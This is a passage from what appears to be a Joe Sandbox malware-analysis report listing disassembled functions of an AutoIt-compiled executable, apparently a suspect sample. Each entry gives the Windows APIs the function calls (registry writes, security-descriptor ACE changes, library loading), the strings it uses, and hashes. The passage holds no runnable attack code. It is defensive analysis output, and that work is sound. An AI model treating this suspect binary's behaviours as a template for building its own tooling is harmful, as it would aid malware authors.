                                        • Part of subcall function 0089912D: ScreenToClient.USER32(00000000,?), ref: 0089915E
                                        • Part of subcall function 0089912D: GetAsyncKeyState.USER32(00000001), ref: 00899183
                                        • Part of subcall function 0089912D: GetAsyncKeyState.USER32(00000002), ref: 0089919D
                                      • SetTimer.USER32(00000000,00000000,00000028,008990FC), ref: 00898AA8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                      • String ID: AutoIt v3 GUI
                                      • API String ID: 1458621304-248962490
                                      • Opcode ID: 277889f7d87e62f23a8f6e950a2a2239fcb64001aed0f7f74d52177ac089d269
                                      • Instruction ID: 0dfb994e49ecddc587a1fa0f7a430b853283282c617e015cff1a3ddc90b8cc36
                                      • Opcode Fuzzy Hash: 277889f7d87e62f23a8f6e950a2a2239fcb64001aed0f7f74d52177ac089d269
                                      • Instruction Fuzzy Hash: 2CB17A71A4420AEFDF14DFA8D845BAE3BB5FB48315F14422AFA15EB290DB34A840DB51
                                      Function 008E0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008E1114
                                        • Part of subcall function 008E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,008E0B9B,?,?,?), ref: 008E1120
                                        • Part of subcall function 008E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,008E0B9B,?,?,?), ref: 008E112F
                                        • Part of subcall function 008E10F9: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008E1136
                                        • Part of subcall function 008E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008E114D
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008E0DF5
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008E0E29
                                      • GetLengthSid.ADVAPI32(?), ref: 008E0E40
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 008E0E7A
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008E0E96
                                      • GetLengthSid.ADVAPI32(?), ref: 008E0EAD
                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 008E0EB5
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 008E0EBC
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008E0EDD
                                      • CopySid.ADVAPI32(00000000), ref: 008E0EE4
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008E0F13
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008E0F35
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008E0F47
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E0F6E
                                      • HeapFree.KERNEL32(00000000), ref: 008E0F75
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E0F7E
                                      • HeapFree.KERNEL32(00000000), ref: 008E0F85
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E0F8E
                                      • HeapFree.KERNEL32(00000000), ref: 008E0F95
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 008E0FA1
                                      • HeapFree.KERNEL32(00000000), ref: 008E0FA8
                                        • Part of subcall function 008E1193: GetProcessHeap.KERNEL32(00000008,008E0BB1,?,00000000,?,008E0BB1,?), ref: 008E11A1
                                        • Part of subcall function 008E1193: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 008E11A8
                                        • Part of subcall function 008E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,008E0BB1,?), ref: 008E11B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Heap$Process$Security$Free$AllocateDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                      • String ID:
                                      • API String ID: 4042927181-0
                                      • Opcode ID: fb52d48b3156ce27381bd84fee9da575eac48f26f3bdc27a2ec118a830295f71
                                      • Instruction ID: 20174723025a5cfc942ffdfe4fea0d1ea5c2b38118ba9bae6a93d0a72598f13b
                                      • Opcode Fuzzy Hash: fb52d48b3156ce27381bd84fee9da575eac48f26f3bdc27a2ec118a830295f71
                                      • Instruction Fuzzy Hash: DF718DB1A0424AABDF209FA5DC44BEEBBB8FF09300F048515F959E6191DB709D55CF60
                                      Function 0090C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0090C4BD
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0091CC08,00000000,?,00000000,?,?), ref: 0090C544
                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0090C5A4
                                      • _wcslen.LIBCMT ref: 0090C5F4
                                      • _wcslen.LIBCMT ref: 0090C66F
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0090C6B2
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0090C7C1
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0090C84D
                                      • RegCloseKey.ADVAPI32(?), ref: 0090C881
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0090C88E
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0090C960
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 9721498-966354055
                                      • Opcode ID: 5db753a75fd581d6a6b38b1374d736797d83e333876ef24fec3fbbdc52da5b91
                                      • Instruction ID: 9d326ca60b91fbe0deb0764e1c909ca1ea3811243e1aad4b2f47c5c26141d6ce
                                      • Opcode Fuzzy Hash: 5db753a75fd581d6a6b38b1374d736797d83e333876ef24fec3fbbdc52da5b91
                                      • Instruction Fuzzy Hash: 3A125A756082019FDB14EF18C881A2AB7E5FF89714F14895CF85A9B3A2DB31FD41CB92
                                      Function 0091091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 009109C6
                                      • _wcslen.LIBCMT ref: 00910A01
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00910A54
                                      • _wcslen.LIBCMT ref: 00910A8A
                                      • _wcslen.LIBCMT ref: 00910B06
                                      • _wcslen.LIBCMT ref: 00910B81
                                        • Part of subcall function 0089F9F2: _wcslen.LIBCMT ref: 0089F9FD
                                        • Part of subcall function 008E2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008E2BFA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                      • API String ID: 1103490817-4258414348
                                      • Opcode ID: f1dd3a973e439eff0e7afb23fc4379372162ed921a49cd681d8d251f42cda6d4
                                      • Instruction ID: 679f958f000e369d39a2c10792c9dfaebbd09f1d849ddb892d753e50d5e35882
                                      • Opcode Fuzzy Hash: f1dd3a973e439eff0e7afb23fc4379372162ed921a49cd681d8d251f42cda6d4
                                      • Instruction Fuzzy Hash: A9E19C352083058FCB14EF28C45096AB7E5FFD8318B14895DF8969B3A2D772ED85CB92
                                      Function 0090C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharUpper
                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                      • API String ID: 1256254125-909552448
                                      • Opcode ID: 5da3695b855551a638ac17d1dc477992734b6d39c3c3e1035a0d1f61f1bbe5f5
                                      • Instruction ID: 9e235c7fbee0bc8cc0a8affdfa8de3b3261e1c372510964217b9da95f7a7270c
                                      • Opcode Fuzzy Hash: 5da3695b855551a638ac17d1dc477992734b6d39c3c3e1035a0d1f61f1bbe5f5
                                      • Instruction Fuzzy Hash: 7471F3B260016A8FCB20DF6CC9519BF3399ABA1754F650B28FC66E72C5E635CD44C3A1
                                      Function 0091833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 0091835A
                                      • _wcslen.LIBCMT ref: 0091836E
                                      • _wcslen.LIBCMT ref: 00918391
                                      • _wcslen.LIBCMT ref: 009183B4
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009183F2
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00915BF2), ref: 0091844E
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00918487
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009184CA
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00918501
                                      • FreeLibrary.KERNEL32(?), ref: 0091850D
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0091851D
                                      • DestroyCursor.USER32(?), ref: 0091852C
                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00918549
                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00918555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Load$Image_wcslen$LibraryMessageSend$CursorDestroyExtractFreeIcon
                                      • String ID: .dll$.exe$.icl
                                      • API String ID: 391920613-1154884017
                                      • Opcode ID: 6356dd7e4a74147849c1202e6168eb7c1532ebb34f44ce3274e0322a3c99ed41
                                      • Instruction ID: a976b6bf4b43711ce3d3376c018d1774300e24733b96daf734dcc20e643d0331
                                      • Opcode Fuzzy Hash: 6356dd7e4a74147849c1202e6168eb7c1532ebb34f44ce3274e0322a3c99ed41
                                      • Instruction Fuzzy Hash: 8C61BDB1644219BAEB149F64CC81BFF77ACFB44B11F108649F815D60E1DFB4A990EBA0
                                      Function 00887778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 0-1645009161
                                      • Opcode ID: 54f307cbb41b75be94d4804f31d7703f4b98a1aa39f996f05f874a7a6f7b664c
                                      • Instruction ID: 3d29d337457fd40c4ef9d9d317331fecc4c4946fd3804392f779eb4b97125a6a
                                      • Opcode Fuzzy Hash: 54f307cbb41b75be94d4804f31d7703f4b98a1aa39f996f05f874a7a6f7b664c
                                      • Instruction Fuzzy Hash: 2B81E271644609ABDF20BF64CC42FAE77B8FF55300F184025F905EA196EB74EA51C7A2
                                      Function 008E5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(00000063), ref: 008E5A2E
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008E5A40
                                      • SetWindowTextW.USER32(?,?), ref: 008E5A57
                                      • GetDlgItem.USER32(?,000003EA), ref: 008E5A6C
                                      • SetWindowTextW.USER32(00000000,?), ref: 008E5A72
                                      • GetDlgItem.USER32(?,000003E9), ref: 008E5A82
                                      • SetWindowTextW.USER32(00000000,?), ref: 008E5A88
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 008E5AA9
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 008E5AC3
                                      • GetWindowRect.USER32(?,?), ref: 008E5ACC
                                      • _wcslen.LIBCMT ref: 008E5B33
                                      • SetWindowTextW.USER32(?,?), ref: 008E5B6F
                                      • GetDesktopWindow.USER32 ref: 008E5B75
                                      • GetWindowRect.USER32(00000000), ref: 008E5B7C
                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 008E5BD3
                                      • GetClientRect.USER32(?,?), ref: 008E5BE0
                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 008E5C05
                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 008E5C2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                      • String ID:
                                      • API String ID: 895679908-0
                                      • Opcode ID: ed8c36929be71f15f3623266f1e874f02027933629d8b7c2bd0a1b3828300aff
                                      • Instruction ID: 15196a67065f35e9b57321df55426017351ddcce8993ea03fb11e14c4f20a7aa
                                      • Opcode Fuzzy Hash: ed8c36929be71f15f3623266f1e874f02027933629d8b7c2bd0a1b3828300aff
                                      • Instruction Fuzzy Hash: CA718D71A00B49AFDB20DFA9CE85AAEBBF5FF48718F104918E542E25A0D774E940DB50
                                      Function 008A00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                      Download Yara Rule
                                      APIs
                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 008A00C6
                                        • Part of subcall function 008A00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0095070C,00000FA0,4F77B7F1,?,?,?,?,008C23B3,000000FF), ref: 008A011C
                                        • Part of subcall function 008A00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,008C23B3,000000FF), ref: 008A0127
                                        • Part of subcall function 008A00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,008C23B3,000000FF), ref: 008A0138
                                        • Part of subcall function 008A00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 008A014E
                                        • Part of subcall function 008A00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 008A015C
                                        • Part of subcall function 008A00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 008A016A
                                        • Part of subcall function 008A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008A0195
                                        • Part of subcall function 008A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 008A01A0
                                      • ___scrt_fastfail.LIBCMT ref: 008A00E7
                                        • Part of subcall function 008A00A3: __onexit.LIBCMT ref: 008A00A9
                                      Strings
                                      • kernel32.dll, xrefs: 008A0133
                                      • SleepConditionVariableCS, xrefs: 008A0154
                                      • WakeAllConditionVariable, xrefs: 008A0162
                                      • InitializeConditionVariable, xrefs: 008A0148
                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 008A0122
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                      • API String ID: 66158676-1714406822
                                      • Opcode ID: bc1b8530b5ec734ec805e8feb2c6c0eb6d489fa6bb2b137c745ed7d894edc20f
                                      • Instruction ID: 01b87f1f4c35cf314a45e9840429500e490af5b99220a27b3130c6e5b78717d5
                                      • Opcode Fuzzy Hash: bc1b8530b5ec734ec805e8feb2c6c0eb6d489fa6bb2b137c745ed7d894edc20f
                                      • Instruction Fuzzy Hash: D321497279C7056FFB106B68AC16FE933A4FB86B55F004139F901D66D1DB749800CE91
                                      Function 008E30F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                      • API String ID: 176396367-1603158881
                                      • Opcode ID: a09b5488e84f3d87939e3b414b5f4200b90b62564c6c473738076ee5b8c3ab13
                                      • Instruction ID: 948c2ba2df51d9bc80de1f41e0a7534da51f8acee08907d2c9300aad1e28e3cd
                                      • Opcode Fuzzy Hash: a09b5488e84f3d87939e3b414b5f4200b90b62564c6c473738076ee5b8c3ab13
                                      • Instruction Fuzzy Hash: 92E12632A00656ABCB18DFB9C449BEEFBB0FF56714F548129E456F3280DB30AE458790
                                      Function 008F44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(00000000,00000000,0091CC08), ref: 008F4527
                                      • _wcslen.LIBCMT ref: 008F453B
                                      • _wcslen.LIBCMT ref: 008F4599
                                      • _wcslen.LIBCMT ref: 008F45F4
                                      • _wcslen.LIBCMT ref: 008F463F
                                      • _wcslen.LIBCMT ref: 008F46A7
                                        • Part of subcall function 0089F9F2: _wcslen.LIBCMT ref: 0089F9FD
                                      • GetDriveTypeW.KERNEL32(?,00946BF0,00000061), ref: 008F4743
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$BuffCharDriveLowerType
                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 2055661098-1000479233
                                      • Opcode ID: bffeb52fc05060a21660ad7b3e0d7ef6760b3ece1e997ddd2e0e6045de9a9ac2
                                      • Instruction ID: cbd25c716e52a4e1ae0147e948018b9483ca89c81302b1117ada9a6077f32030
                                      • Opcode Fuzzy Hash: bffeb52fc05060a21660ad7b3e0d7ef6760b3ece1e997ddd2e0e6045de9a9ac2
                                      • Instruction Fuzzy Hash: EBB1B9716083069BC710EF38C890A7BB7E5FFA6724F50591AF696C7291E730D944CB62
                                      Function 0090AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 0090B198
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0090B1B0
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0090B1D4
                                      • _wcslen.LIBCMT ref: 0090B200
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0090B214
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0090B236
                                      • _wcslen.LIBCMT ref: 0090B332
